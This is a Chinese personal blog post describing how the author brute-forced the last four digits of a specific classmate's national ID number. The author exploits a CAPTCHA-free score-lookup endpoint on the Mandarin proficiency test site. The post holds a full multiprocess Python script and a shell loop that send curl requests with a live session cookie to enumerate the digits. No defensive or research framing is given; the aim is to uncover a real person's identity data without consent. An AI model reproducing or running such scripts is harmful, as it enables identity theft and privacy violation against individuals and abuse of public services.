mingjun97的blog

日常填坑的各种记录

| python

高并发API测试脚本

通过一定的手段拿到了某同学的身份证号前6位和生日,利用普通话考试系统查询成绩不需要验证码的业务逻辑漏洞,确认该同学参加过普通话考试,遂编写python脚本如下对该同学的身份证号后四位进行爆破。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# -*- coding: utf-8 -*- 
import os
from multiprocessing import Process

def inquiry(id):
    r = os.popen(r"curl 'http://www.cltt.org/StudentScore/ScoreResult' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://www.cltt.org' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://www.cltt.org/studentscore' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8,en;q=0.7,zh-TW;q=0.6' -H 'Cookie: aliyungf_tc=AQAAANWP1Fs2jA4A7itfR5Mbkqy5xaQh; ASP.NET_SessionId=iplra4tpuhk0bhlmel3kqdlk' --data 'name=URLENCODED&stuID=&idCard=xxxxxx"+str(id)+"' --compressed")
    if "考试时间" in r.read():
        print(id)    
    # print(r)

if __name__ == "__main__":
    for i in range(1000,9999):
        p = Process(target=inquiry, args=(i,))
        p.start()

运行时执行以下指令:

1
python test.py > result

而后可以观察到文件夹内出现了文件result,试用cat指令即可查看。

补充

shell脚本进行单线程遍历,发现效率很低(1000~9999大概需要遍历4000秒,遂放弃。此处将脚本贴出。)

1
for ((i=2000;i<=9999;i++)); do; echo $i; curl 'http://www.cltt.org/StudentScore/ScoreResult' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://www.cltt.org' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://www.cltt.org/studentscore' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8,en;q=0.7,zh-TW;q=0.6' -H 'Cookie: aliyungf_tc=AQAAANWP1Fs2jA4A7itfR5Mbkqy5xaQh; ASP.NET_SessionId=iplra4tpuhk0bhlmel3kqdlk' --data 'name=URLENCODED&stuID=&idCard=xxxxxx19971020`echo $i`' --compressed | grep "考试时间"; done

Comments